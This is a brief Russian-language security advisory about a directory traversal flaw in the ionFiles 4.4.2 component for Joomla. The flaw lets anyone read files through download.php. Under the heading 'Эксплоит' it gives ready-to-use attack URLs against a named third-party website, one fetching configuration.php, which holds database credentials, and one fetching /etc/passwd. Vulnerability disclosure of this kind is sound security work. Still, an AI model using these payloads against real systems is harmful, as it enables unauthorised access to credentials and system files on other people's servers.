Программа: Joomla Component ionFiles 4.4.2

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных сценарием download.php. Атакующий может
получить несанкционированный доступ к содержимому файлов на целевой системе.

Эксплоит:

http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1

http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1



Оставить мнение